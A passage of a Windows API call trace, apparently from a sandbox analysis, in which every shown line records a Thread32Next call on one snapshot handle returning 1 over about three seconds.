[0179.721] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.722] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.723] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.724] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.725] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.726] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.728] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.731] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.733] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.735] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.867] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.868] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.869] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.870] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.871] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.872] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.873] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.874] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.875] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.876] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.876] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.877] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.878] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.879] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.879] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.880] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.881] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.882] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.883] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.887] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.888] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.941] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.942] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.943] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.944] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.945] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.946] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.947] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.948] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.948] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.949] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.950] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.951] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.951] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.952] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.952] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.618] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.618] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.619] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.620] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.621] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.622] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.622] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.623] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.624] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.625] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.625] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.626] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.627] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.628] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.629] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.629] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.630] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.631] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.632] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.633] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.633] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.635] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.636] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.637] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.637] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.638] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.639] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.639] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.640] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.641] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.643] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.644] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.645] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.646] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.646] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.647] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.648] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.649] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.649] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.650] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.651] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.652] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.652] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.855] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.856] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.857] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.859] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.860] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.865] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.866] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.867] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.867] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.875] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.876] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.877] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.879] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.883] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.884] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.886] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.888] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.889] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.890] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.891] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.892] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.892] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.894] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.895] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.896] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.897] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.898] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.898] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.899] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.900] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.901] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.902] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0180.903] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.082] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.083] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.084] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.085] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.085] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.086] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.087] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.088] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.089] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.091] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.092] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.093] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.095] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.096] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.097] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.098] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.099] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.100] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.101] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.102] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.103] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.104] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.104] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.105] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.106] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.107] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.109] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.109] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.110] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.111] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.112] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.113] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.114] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.115] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.115] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.351] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.352] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.353] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.354] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.355] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.355] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.356] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.357] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.358] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.359] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.359] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.360] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.361] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.361] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.362] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.363] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.363] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.367] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.368] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.369] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.369] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.370] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.371] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.372] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.372] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.373] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.374] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.375] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.376] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.376] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.377] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.378] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.379] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.380] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.380] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.382] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.382] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.383] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.384] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.385] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.385] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.386] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.387] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.624] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.625] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.625] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.626] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.627] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.627] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.628] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.629] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.629] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.630] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.631] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.632] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.632] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.633] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.633] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.634] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.635] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.636] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.636] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.637] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.637] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.638] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.639] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.639] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.640] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.640] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.641] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.642] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.642] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.643] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.643] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.644] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.645] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.645] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.646] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.647] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.648] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.648] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.649] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.650] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.650] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.651] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.652] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.652] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.653] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.654] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.654] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.655] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.655] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.656] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.656] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.657] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.658] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.659] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.858] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.859] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.859] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.860] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.861] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.861] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.862] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.863] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.864] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.865] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.865] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.866] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.867] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.867] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.868] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.869] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.870] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.872] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.872] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.873] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.874] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.875] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.875] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.876] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.878] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.879] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.880] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.881] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.881] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.882] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.883] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.883] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.884] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.885] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.886] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.887] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.887] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.888] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.889] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.890] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.890] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.891] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0181.892] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.078] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.079] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.079] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.080] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.080] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.081] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.081] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.082] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.084] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.084] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.085] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.085] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.086] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.087] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.087] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.088] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.088] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.089] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.090] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.091] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.092] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.092] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.093] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.093] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.094] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.095] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.095] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.096] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.097] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.097] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.098] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.098] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.099] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.100] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.100] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.101] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.102] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.102] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.103] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.103] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.104] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.105] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.105] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.106] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.107] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.107] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.108] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.109] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.109] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.110] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.110] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.111] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.111] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.112] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.113] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.113] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.359] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.359] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.360] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.361] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.362] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.363] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.363] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.364] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.365] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.366] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.366] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.367] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.368] Thread32Next (hSnapshot=0x17c, 